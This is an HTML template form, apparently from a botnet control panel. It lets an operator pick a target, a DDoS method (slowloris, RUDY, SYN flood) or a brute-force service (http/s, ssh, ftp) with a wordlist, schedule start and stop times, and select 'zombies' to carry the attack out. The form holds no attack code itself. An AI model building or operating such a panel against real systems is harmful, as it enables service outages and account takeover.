
{% block form %}

<style>
fieldset#start_dt:enabled {
  background-color: palegreen;
}
fieldset#stop_dt:enabled {
  background-color: #d77474;
}
</style>

<form id="{{ data_type + '-form' }}" action="" method="POST">

  <div class="field-row-stacked">
    <label for="target"><span class="margin-right-icon">🎯  </span><span> target:</span> </label>
    <input id="target" name="target" type="text" value="{{ request.form.target }}" />
  </div>

  {% if 'ddos' in data_type %}
  <div class="field-row-stacked">
    <label for="ddos_type"><span class="margin-right-icon">💣  </span><span> attack type:</span> </label>
    <select id="ddos_type" name="ddos_type">
      <option value="slowloris">slowloris</option>
      <option value="rudy">RUDY</option>
      <option value="syn">SYN flood</option>
    </select>
  </div>

  {% elif 'brute' in data_type %}
  <div class="field-row-stacked">
    <label for="brute_type"><span class="margin-right-icon">🚪  </span><span> service:</span> </label>
    <select id="brute_type" name="brute_type">
      <option value="http">http/s</option>
      <option value="ssh">ssh</option>
      <option value="ftp">ftp</option>
    </select>
  </div>

  <div class="field-row-stacked">
    <label for="brute_wordlist"><span class="margin-right-icon">🗒️  </span><span> wordlist:</span> </label>
    <input id="brute_wordlist" name="brute_wordlist" type="text" value="{{ request.form.brute_wordlist }}" />
  </div>

  {% endif %}

  <br>
  <input type="checkbox" name="enable_start_dt" id="enable_start_dt" onclick="enable_fields('enable_start_dt', ['start_dt']);">
  <label for="enable_start_dt"><span class="margin-right-icon">⏲️  </span><span> start at:</span> </label>
  <fieldset id="start_dt" disabled>
    {% with bef_aft = 'aft', section = 'start_at' %}
      {% include 'forms/datetime-inputs.html' %}
    {% endwith %}
  </fieldset>
  <input type="checkbox" name="enable_stop_dt" id="enable_stop_dt" onclick="enable_fields('enable_stop_dt', ['stop_dt']);">
  <label for="enable_stop_dt"><span class="margin-right-icon">⏲️  </span><span> stop at:</span> </label>
  <fieldset id="stop_dt" disabled>
    {% with bef_aft = 'aft', section = 'stop_at' %}
      {% include 'forms/datetime-inputs.html' %}
    {% endwith %}
  </fieldset>
  <br>

  <div class="field-row-stacked">
    {% with data_type = 'zombies', brief=True %}
      {% include 'forms/table-results-form.html' %}
    {% endwith %}
  </div>

  {% if (create_error and 'password' in create_error) %}
  <div style="width: 100%; margin 0 auto;"><p class="error">{{ create_error }}</p></div>
  {% endif %}

  <button type="submit" id="{{ 'btn-' + data_type + '-creator' }}" name="{{ 'btn-' + data_type + '-creator' }}" style="display: block; width: 50%; margin: 1rem auto;">Commit</button>

</form>

{% endblock %}